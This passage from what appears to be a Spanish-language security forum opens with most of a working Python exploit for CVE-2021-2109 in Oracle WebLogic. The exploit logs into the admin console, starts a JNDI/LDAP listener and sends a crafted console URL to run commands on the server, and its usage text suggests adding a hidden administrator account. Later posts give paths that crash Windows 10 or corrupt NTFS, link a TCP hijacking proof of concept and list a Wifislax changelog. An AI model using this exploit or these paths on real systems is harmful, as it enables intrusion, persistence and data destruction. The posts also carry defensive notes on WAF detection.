        sUser = input('[?] Username [weblogic] : ')
        if sUser == '': sUser = 'weblogic'
    if options.password: sPass = options.password
    else:
        sPass = input('[?] Password [Passw0rd-] : ')
        if sPass == '': sPass = 'Passw0rd-'
    if options.command: sCMD = options.command
    else:
        sCMD = input('[?] Command to run [calc] : ')
        if sCMD == '': sCMD = 'calc'
    if options.listenaddr: sLHOST = options.listenaddr
    else:
        sLHOST = input('[?] Local IP to connect back to [192.168.0.10] : ')
        if sLHOST == '': sLHOST = '192.168.0.10'
    if options.verbose: bVerbose = True
    else: bVerbose = False
    return (sHost, sUser, sPass, sCMD, sLHOST, bVerbose)

def startListener(sJarFile, sCMD, sAddress, bVerbose):
    global oRun
    oRun = runJar(sJarFile, sCMD, sAddress)
    oRun.start()
    print('[!] Starting listener thread and waiting 3 seconds to retrieve the endpoint')
    oRun.join(3)
    if not oRun.stderr == '':
        exit('[-] Error starting Java listener:\n' + oRun.stderr)
    bThisLine=False
    if bVerbose: print('[!] For this to work, make sure your firewall is configured to be reachable on 1389 & 8180')
    for line in oRun.stdout:
        if bThisLine: return line.split('/')[3].replace('\n','')
        if 'JDK 1.8' in line: bThisLine = True

def endIt():
    global oRun
    print('[+] Closing threads')
    if oRun: oRun.proc.terminate()
    exit(0)

def main():
    usage = (
        'usage: %prog [options] URL \n'
        ' Make sure to have "JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar"\n'
        ' in the current working folder\n'
        'Get it here: https://github.com/welk1n/JNDI-Injection-Exploit\n'
        'Only works when hacker is reachable via an IPv4 address\n'
        'Use "whoami" to just verify the vulnerability (OPSEC safe but no output)\n'
        'Example: CVE-2021-2109.py -u weblogic -p Passw0rd -c calc -l 192.168.0.10 http://192.168.0.100:7001\n'
        'Sample payload as admin: cmd /c net user pwned Passw0rd- /add & net localgroup administrators pwned /add'
        )

    parser = optparse.OptionParser(usage=usage)
    parser.add_option('--username', '-u', dest='username')
    parser.add_option('--password', '-p', dest='password')
    parser.add_option('--command', '-c', dest='command')
    parser.add_option('--listen', '-l', dest='listenaddr')
    parser.add_option('--verbose', '-v', dest='verbose', action="store_true", default=False)

    ## Get or ask for the vars
    (options, args) = parser.parse_args()
    (sHost, sUser, sPass, sCMD, sLHOST, bVerbose) = checkParams(options, args)

    ## Verify Java and JAR file
    sJarFile = findJNDI()
    findJAVA(bVerbose)
   
    ## Keep track of cookies between requests
    cj = http.cookiejar.CookieJar()
    oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
   
    print('[+] Verifying reachability')
    ## Get the cookie
    oRequest = urllib.request.Request(url = sHost + '/console/')
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    for c in cj:
        if c.name == 'ADMINCONSOLESESSION':
            if bVerbose: print('[+] Got cookie "' + c.value + '"')

    ## Logging in
    lData = {'j_username' : sUser, 'j_password' : sPass, 'j_character_encoding' : 'UTF-8'}
    lHeaders = {'Referer' : sHost + '/console/login/LoginForm.jsp'}
    oRequest = urllib.request.Request(url = sHost + '/console/j_security_check', data = urllib.parse.urlencode(lData).encode(), headers = lHeaders)
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    sResult = oResponse.read().decode(errors='ignore').split('\r\n')
    bSuccess = True
    for line in sResult:
        if 'Authentication Denied' in line: bSuccess = False
    if bSuccess: print('[+] Succesfully logged in!\n')
    else: exit('[-] Authentication Denied')
   
    ## Launch the LDAP listener and retrieve the random endpoint value
    sRandom = startListener(sJarFile, sCMD, sLHOST, bVerbose)
    if bVerbose: print('[+] Got Java value: ' + sRandom)

    ## This is the actual vulnerability, retrieve LDAP data from victim which the runs on victim, it bypasses verification because IP is written as "127.0.0;1" instead of "127.0.0.1"
    print('\n[+] Firing exploit now, hold on')
    ##  http://192.168.0.100:7001/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/5r5mu7;AdminServer-)
    sConvertedIP = sLHOST.split('.')[0] + '.' + sLHOST.split('.')[1] + '.' + sLHOST.split('.')[2] + ';' + sLHOST.split('.')[3]
    sFullUrl = sHost + r'/console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://' + sConvertedIP + ':1389/' + sRandom + r';AdminServer%22)'
    if bVerbose: print('[!] Using URL ' + sFullUrl)
    oRequest = urllib.request.Request(url = sFullUrl, headers = lHeaders)
    oResponse = oOpener.open(oRequest, timeout = iTimeout)
    time.sleep(5)
    bExploitWorked = False
    for line in oRun.stdout:
        if 'Log a request' in line: bExploitWorked = True
        if 'BypassByEl' in line: print('[-] Exploit failed, wrong SDK on victim')
    if not bExploitWorked: print('[-] Exploit failed, victim likely patched')
    else: print('[+] Victim vulnerable, exploit worked (could be as limited account!)')
    if bVerbose: print(oRun.stderr)
    endIt()

if __name__ == "__main__":
    try: main()
    except KeyboardInterrupt: endIt()


Cuidado peticiones tipo:

GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;10:1389/hacked;AdminServer-)

Ya están saliendo varias reglas para WAF.
#42
El secuestro ciego de TCP / IP sigue vivo en Windows 7... y no solo. Esta versión de Windows es sin duda uno de los objetivos más "jugosos" a pesar de que el 14 de enero de 2020 fue el EOL (fin de vida útil) oficial para ella. Según varios datos, Windows 7 tiene alrededor del 25% del mercado de sistemas operativos (SO) y sigue siendo el segundo sistema operativo de escritorio más popular del mundo.

Sólo funciona con protocolos ampliamente implementados que no cifran el tráfico, por ejemplo, FTP, SMTP, HTTP, DNS, IMAP

¿Dónde está el error?

En la implementación de la pila TCP / IP para Windows 7, IP_ID es un contador global.

Tool - PoC
http://site.pi3.com.pl/exp/devil_pi3.c

Fuente:
http://blog.pi3.com.pl/?p=850
#43
Se sigue utilizando como base slackware64-14.2 , con todos sus parches de seguridad al día.
Esta iso es un punto de control para la versión estable , se han actualizado todos los paquetes base , como firmwares , kernel ... navegador etc.

Como kernel sale con linux-5.4.91 LTS
Como navegador , trae el recien estrenado chrome 88 , que ademas de muchos parches de seguridad , han eliminado finalmente el soporte de flash player.



Seguramente sera la ultima versión de wifislax con kde4 y slackware64-14.2

Changelog

Citar20/01/2021
01 - Actualizado kernel 5.4.89 --> 5.4.91
02 - Actualizados firmwares de sistema
03 - Actualizado chrome-85.0.4183.121 --> 88.0.4324.96
04 - Actualizado bettercap-2.28 --> 2.29
05 - Actualizado airgeddon-10.31 --> 10.40

12/01/2021
01 - Actualizado kernel 5.4.88 --> 5.4.89
02 - Actualizado wpscan-3.8.12 --> 3.8.13
03 - Modificado hostapd-2.9 con mas opciones.

06/01/2021
01 - Actualizado kernel 5.4.87 --> 5.4.88
02 - Actualizados firmwares de sistema
03 - Mejorado wallpaper island por conca
    Se veían imperfecciones en la parte baja
    si usábamos un monitor grande.

Descarga
https://ns2.elhacker.net/isos/wifislax64-2.4-final.iso

Fuente:
https://foro.seguridadwireless.net/live-wifislax/wifislax64-2-4-final-para-descarga
#44
Si escribes esto en la barra de direcciones del navegador:

Citar\\.\globalroot\device\condrv\kernelconnect

O si guardas la ruta en un fichero .URL obtienes una bonita pantalla azul de a muerte de Windows 10

Pero según elmundo[].es -> "estropea tu ordenador para siempre"  Gizmodo -> "puede arruinar por completo tu PC" elConfidencial  -> "puede bloquear tu Windows 10 para siempre". Titulares sensacionalistas. Información completamente falsa. Reinicias Windows y sin problemas.

Y pero aún error en NTFS:

Error en Windows 10 corrompe tu disco duro al ver el ícono un archivo

c:\:$i30:bitmap

Ambos descubiertos por https://twitter.com/jonasLyk

Ejemplos:
https://blog.elhacker.net/2021/01/error-en-windows-10-corrompe-su-disco-NTFS-i30-bitmap-icon-archivo-comando.html
#45
Noticias / La WikiPedia cumple hoy 20 años
15 Enero 2021, 19:36 PM
Hoy Wikipedia celebra su 20 cumpleaños.

Se erige como un brillante ejemplo de #WebWeWant: un espacio abierto y colaborativo que brinda acceso gratuito al conocimiento en todo el mundo.

Wikipedia, que fue abierta por primera vez hace 20 años el 15 de enero del años 2001.



El 15 de enero de 2001 el empresario Jimmy Wales y el filósofo Larry Sanger, ambos estadounidenses, crearon Wikipedia, una enciclopedia libre, escrita y editada por voluntarios y publicada en internet, que nació para sumar conocimiento y con la convicción de que este es propiedad de todas las personas del mundo.

https://wikimediafoundation.org/es/wikipedia20/